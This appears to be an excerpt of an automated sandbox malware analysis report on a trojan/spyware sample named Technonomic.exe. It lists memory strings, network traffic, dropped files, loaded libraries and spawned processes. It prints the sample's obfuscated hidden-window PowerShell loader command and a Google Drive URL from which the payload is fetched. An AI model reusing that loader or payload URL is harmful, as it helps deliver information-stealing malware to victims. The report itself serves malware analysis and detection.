Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000007.00000002.2620412422.00000000259AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000007.00000002.2620412422.00000000259A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000007.00000002.2606694984.0000000009E50000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2606714921.0000000009EAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B
Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6Bs
Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download
Source: msiexec.exe, 00000007.00000002.2606714921.0000000009F0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download%-
Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download1-
Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=downloade
Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=downloadle
Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=downloado.
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025865000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000007.00000002.2620412422.00000000259DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000007.00000002.2620412422.00000000259D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.9:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49962 version: TLS 1.2

Source: C:\Users\user\Desktop\Technonomic.exe

Code function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405421

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Technonomic.exe

Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004033B6

Source: C:\Users\user\Desktop\Technonomic.exe

File created: C:\Windows\resources\unthick.ini

Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_00406847	0_2_00406847
Source: C:\Users\user\Desktop\Technonomic.exe	Code function: 0_2_00404C5E	0_2_00404C5E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032A5362	7_2_032A5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AD278	7_2_032AD278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AC146	7_2_032AC146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AC738	7_2_032AC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AC468	7_2_032AC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032ACA08	7_2_032ACA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AE988	7_2_032AE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032ACFAB	7_2_032ACFAB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032A3E09	7_2_032A3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032ACCD8	7_2_032ACCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032A7118	7_2_032A7118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AA088	7_2_032AA088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032A3AA1	7_2_032A3AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AF961	7_2_032AF961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032AE97B	7_2_032AE97B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032A39EE	7_2_032A39EE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_032A29EC	7_2_032A29EC

Source: Technonomic.exe

Static PE information: invalid certificate

Source: Technonomic.exe, 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameharbinger.exeJ vs Technonomic.exe
Source: Technonomic.exe	Binary or memory string: OriginalFilenameharbinger.exeJ vs Technonomic.exe
Source: Technonomic.exe.2.dr	Binary or memory string: OriginalFilenameharbinger.exeJ vs Technonomic.exe

Source: Technonomic.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/16@5/5

Source: C:\Users\user\Desktop\Technonomic.exe

0_2_004033B6

Source: C:\Users\user\Desktop\Technonomic.exe

Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046E2

Source: C:\Users\user\Desktop\Technonomic.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\Technonomic.exe

File created: C:\Users\user\AppData\Local\magmaet

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\Technonomic.exe

File created: C:\Users\user\AppData\Local\Temp\nse22EC.tmp

Jump to behavior

Source: Technonomic.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Technonomic.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Technonomic.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Technonomic.exe

File read: C:\Users\user\Desktop\Technonomic.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Technonomic.exe "C:\Users\user\Desktop\Technonomic.exe"
Source: C:\Users\user\Desktop\Technonomic.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Technonomic.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe

